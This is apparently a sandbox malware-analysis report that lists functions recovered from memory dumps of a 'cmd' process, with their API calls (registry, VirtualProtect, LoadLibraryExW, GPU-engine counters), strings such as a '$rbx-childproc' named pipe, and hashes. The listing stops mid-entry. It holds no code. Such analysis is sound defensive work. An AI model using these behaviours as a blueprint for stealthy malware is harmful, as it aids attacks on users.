Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 57ef5a2f26e92c7387a444d54b27659cde2b6c6aea8e6b590fca51004aa6a4db
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: CF515132200B98EAEB10CFA1E44C75A77A1F798F95F545225EE490B758DF38D0A58B00

Function 0000022123C212B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000022123C21315
GetProcessHeap.KERNEL32 ref: 0000022123C21323
HeapAlloc.KERNEL32 ref: 0000022123C21334
RegEnumValueW.ADVAPI32 ref: 0000022123C21393

Part of subcall function 0000022123C21530: StrCmpIW.SHLWAPI ref: 0000022123C21561

GetProcessHeap.KERNEL32 ref: 0000022123C213DB
HeapAlloc.KERNEL32 ref: 0000022123C213E9
GetProcessHeap.KERNEL32 ref: 0000022123C21406
HeapFree.KERNEL32 ref: 0000022123C21414
lstrlenW.KERNEL32 ref: 0000022123C2141D
GetProcessHeap.KERNEL32 ref: 0000022123C2142B
HeapAlloc.KERNEL32 ref: 0000022123C21439
StrCpyW.SHLWAPI ref: 0000022123C2145B
GetProcessHeap.KERNEL32 ref: 0000022123C21472
HeapFree.KERNEL32 ref: 0000022123C21480

Strings

d, xrefs: 0000022123C21356

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 97e77ffeb9d1e88d428ca5f5b4e114550d1ed5fd9b14859275cb2bb65874dcff
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 1F519332600B98E6E720CFA2E44879A77A1F798F98F445225EE4D0B718DF3DC1A5C740

Function 0000022123C5EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,0000022123C5F34A,?,?,00000000,0000022123C5F2CD), ref: 0000022123C5EFF5
GetLastError.KERNEL32(?,?,00000000,0000022123C5F2CD), ref: 0000022123C5F007
LoadLibraryExW.KERNEL32(?,?,00000000,0000022123C5F2CD), ref: 0000022123C5F049
VirtualProtect.KERNEL32 ref: 0000022123C5F0A5
VirtualProtect.KERNEL32 ref: 0000022123C5F0D6
FreeLibrary.KERNEL32(?,?,00000000,0000022123C5F2CD), ref: 0000022123C5F11A
GetProcAddress.KERNEL32(?,?,00000000,0000022123C5F2CD), ref: 0000022123C5F126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 0000022123C5F157, 0000022123C5F165
ext-ms-, xrefs: 0000022123C5F02E
api-ms-, xrefs: 0000022123C5F01B

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 1d69e27629401eb29d856f0f5e3ddecb0d918111c38792e697ea0280213006cd
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: A951BA2170172CE5EA159BD6A848BA52250F7A8BB0F582726FE3D5B3D0DF38D4B58640

Function 0000022123C2EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,0000022123C2F34A,?,?,00000000,0000022123C2F2CD), ref: 0000022123C2EFF5
GetLastError.KERNEL32(?,?,00000000,0000022123C2F2CD), ref: 0000022123C2F007
LoadLibraryExW.KERNEL32(?,?,00000000,0000022123C2F2CD), ref: 0000022123C2F049
VirtualProtect.KERNEL32 ref: 0000022123C2F0A5
VirtualProtect.KERNEL32 ref: 0000022123C2F0D6
FreeLibrary.KERNEL32(?,?,00000000,0000022123C2F2CD), ref: 0000022123C2F11A
GetProcAddress.KERNEL32(?,?,00000000,0000022123C2F2CD), ref: 0000022123C2F126

Strings

ext-ms-, xrefs: 0000022123C2F02E
AppPolicyGetProcessTerminationMethod, xrefs: 0000022123C2F157, 0000022123C2F165
api-ms-, xrefs: 0000022123C2F01B

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 05f60aea5c4de112aa8aa0c458d90be7212996debdcbfbcd63c9ffc654b25013
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 1551C72170076CE1EA159B96A848BA52350BB68BB0F482726FE3D4B3D0DF38C5B5C740

Function 0000022123C533A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000022123C533FD
GetProcessHeap.KERNEL32 ref: 0000022123C53412
HeapAlloc.KERNEL32 ref: 0000022123C53420
PdhGetCounterInfoW.PDH ref: 0000022123C53436
StrCmpW.SHLWAPI ref: 0000022123C5344B

Part of subcall function 0000022123C53950: StrCmpNW.SHLWAPI ref: 0000022123C53972
Part of subcall function 0000022123C53950: StrStrW.SHLWAPI ref: 0000022123C53990
Part of subcall function 0000022123C53950: StrToIntW.SHLWAPI ref: 0000022123C539B7

GetProcessHeap.KERNEL32 ref: 0000022123C53488
HeapFree.KERNEL32 ref: 0000022123C53496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000022123C53444

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 4315b492a89893443b53e77b8f4224017620586a13450126cff0ed5a44a5d11b
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: F031EA22600A68E7E721CF92B80CB59A7A0F7A8BC5F541326FE495B664DF38D4B58700

Function 0000022123C233A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000022123C233FD
GetProcessHeap.KERNEL32 ref: 0000022123C23412
HeapAlloc.KERNEL32 ref: 0000022123C23420
PdhGetCounterInfoW.PDH ref: 0000022123C23436
StrCmpW.SHLWAPI ref: 0000022123C2344B

Part of subcall function 0000022123C23950: StrCmpNW.SHLWAPI ref: 0000022123C23972
Part of subcall function 0000022123C23950: StrStrW.SHLWAPI ref: 0000022123C23990
Part of subcall function 0000022123C23950: StrToIntW.SHLWAPI ref: 0000022123C239B7

GetProcessHeap.KERNEL32 ref: 0000022123C23488
HeapFree.KERNEL32 ref: 0000022123C23496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000022123C23444

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 8e915207cec2f1648864f9e869b76a25628f9480e9309c777b190082722812e6
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: DA31E822600B68E6E721CF92E80CB59B7A0F7A8BC4F445316FE4D4B624DF38C5B68340

Function 0000022123C534B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000022123C53516
GetProcessHeap.KERNEL32 ref: 0000022123C53527
HeapAlloc.KERNEL32 ref: 0000022123C53535
PdhGetCounterInfoW.PDH ref: 0000022123C5354B
StrCmpW.SHLWAPI ref: 0000022123C53560

Part of subcall function 0000022123C53950: StrCmpNW.SHLWAPI ref: 0000022123C53972
Part of subcall function 0000022123C53950: StrStrW.SHLWAPI ref: 0000022123C53990
Part of subcall function 0000022123C53950: StrToIntW.SHLWAPI ref: 0000022123C539B7

GetProcessHeap.KERNEL32 ref: 0000022123C5358D
HeapFree.KERNEL32 ref: 0000022123C5359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000022123C53559

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 30ee69ebc4e729d243cf92d13ba5dad74d9bfa07243b5e7bb6426f33be65792d
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 1031B421600B59EAE711DFA2B448B5963A0F7A4F84F946226AE4A5B764DF38D4B18700

Function 0000022123C234B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000022123C23516
GetProcessHeap.KERNEL32 ref: 0000022123C23527
HeapAlloc.KERNEL32 ref: 0000022123C23535
PdhGetCounterInfoW.PDH ref: 0000022123C2354B
StrCmpW.SHLWAPI ref: 0000022123C23560

Part of subcall function 0000022123C23950: StrCmpNW.SHLWAPI ref: 0000022123C23972
Part of subcall function 0000022123C23950: StrStrW.SHLWAPI ref: 0000022123C23990
Part of subcall function 0000022123C23950: StrToIntW.SHLWAPI ref: 0000022123C239B7

GetProcessHeap.KERNEL32 ref: 0000022123C2358D
HeapFree.KERNEL32 ref: 0000022123C2359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000022123C23559

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: d1968111412f52c04050fe4b63ecc802c903567fa46490583b0ee2df9f688c95
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: AC31B421600B19EAE751EF92A848B5973A0F7A4F84F046226AE4E4B724DF38C5F68700

Function 0000022123BF962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000022123BF9689

Part of subcall function 0000022123BFA544: __GetUnwindTryBlock.LIBCMT ref: 0000022123BFA587
Part of subcall function 0000022123BFA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000022123BFA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000022123BF9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000022123BF99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000022123BF9ABC

Strings

csm, xrefs: 0000022123BF96A3
csm, xrefs: 0000022123BF9784
csm, xrefs: 0000022123BF970A

Memory Dump Source

Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: b20a8eebf1e74f96e928e47f6a3a1bbbb4c8b585169a5234961efa9d16cfccab
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 8BD17E32604760E7EB70AFA59448BAD77B0F769788F106315FE895BB5ADB36C0A1C700

Function 0000022123C5A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000022123C5A289

Part of subcall function 0000022123C5B144: __GetUnwindTryBlock.LIBCMT ref: 0000022123C5B187
Part of subcall function 0000022123C5B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000022123C5B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000022123C5A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000022123C5A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000022123C5A6BC

Strings

csm, xrefs: 0000022123C5A2A3
csm, xrefs: 0000022123C5A384
csm, xrefs: 0000022123C5A30A

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 981b6f9507672b786f69f42c9d40efad8fb101f4a5f4d8578a14454d5235d979
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 82D18F36604758DAEB25DFA6A448B9D77A0F765788F102206FE896B7D5CB34C4F4C700

Function 0000022123BC962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000022123BC9689

Part of subcall function 0000022123BCA544: __GetUnwindTryBlock.LIBCMT ref: 0000022123BCA587
Part of subcall function 0000022123BCA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000022123BCA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000022123BC9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000022123BC99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000022123BC9ABC

Strings

csm, xrefs: 0000022123BC9784
csm, xrefs: 0000022123BC96A3
csm, xrefs: 0000022123BC970A

Memory Dump Source

Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: d080e0794b90445366dca5eb8424c5245918b8a824f91b2a3389a344e87f1bfa
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: B8D16D726047A0DAFB70EFA5948879D77B0F769788F101616FE899BB56DB34C0A0C700

Function 0000022123C2A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000022123C2A289

Part of subcall function 0000022123C2B144: __GetUnwindTryBlock.LIBCMT ref: 0000022123C2B187
Part of subcall function 0000022123C2B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000022123C2B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000022123C2A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000022123C2A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000022123C2A6BC

Strings

csm, xrefs: 0000022123C2A2A3
csm, xrefs: 0000022123C2A384
csm, xrefs: 0000022123C2A30A

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 734ea23257db87df54cbd4b77dfbf6cc0d4d0384810fd756c6481ac45f8cec4d
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 17D16E36604B98EAFB24DBA59448B9D77A0F765798F102216EE8D5BB96CF34C4F0C700

Function 0000022123C5104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000022123C510B1
RegEnumValueW.ADVAPI32 ref: 0000022123C51117
GetProcessHeap.KERNEL32 ref: 0000022123C5115A
HeapAlloc.KERNEL32 ref: 0000022123C51168
GetProcessHeap.KERNEL32 ref: 0000022123C51185
HeapFree.KERNEL32 ref: 0000022123C51193

Strings

d, xrefs: 0000022123C510D6

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 8f53cf649f8473b006d54907da3ca272ff069131d9fd40d4dcf0ceb4892921bc
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 3A41A233214B84DAEB60CF61E44879E77A1F388B88F449216EF891B758DF39D4A5CB40

Function 0000022123C2104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000022123C210B1
RegEnumValueW.ADVAPI32 ref: 0000022123C21117
GetProcessHeap.KERNEL32 ref: 0000022123C2115A
HeapAlloc.KERNEL32 ref: 0000022123C21168
GetProcessHeap.KERNEL32 ref: 0000022123C21185
HeapFree.KERNEL32 ref: 0000022123C21193

Strings

d, xrefs: 0000022123C210D6

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 32c803f958419a6e2ed5ae3377227eef0a14dca4db56dfa3b2a51f5e835b32a9
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 30419233214B94D6E760CF61E44879E77A1F388B98F449216EF890B758DF39C5A5CB40

Function 0000022123C52518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000022123C5252D
GetCurrentProcessId.KERNEL32 ref: 0000022123C52537
CreateFileW.KERNEL32 ref: 0000022123C52568
WriteFile.KERNEL32 ref: 0000022123C52590
ReadFile.KERNEL32 ref: 0000022123C525AF
CloseHandle.KERNEL32 ref: 0000022123C525B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 0000022123C52549

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 42928a5a813d5e6400b4694c9d188ee62d512c60562a3007aaaa6028bb9303ba
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 02116A32618B54D6E7108B61F458B1A7760F398BD4F941312EF590AAA8CF3CC1A4CF40

Function 0000022123C22518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000022123C2252D
GetCurrentProcessId.KERNEL32 ref: 0000022123C22537
CreateFileW.KERNEL32 ref: 0000022123C22568
WriteFile.KERNEL32 ref: 0000022123C22590
ReadFile.KERNEL32 ref: 0000022123C225AF
CloseHandle.KERNEL32 ref: 0000022123C225B8

Strings

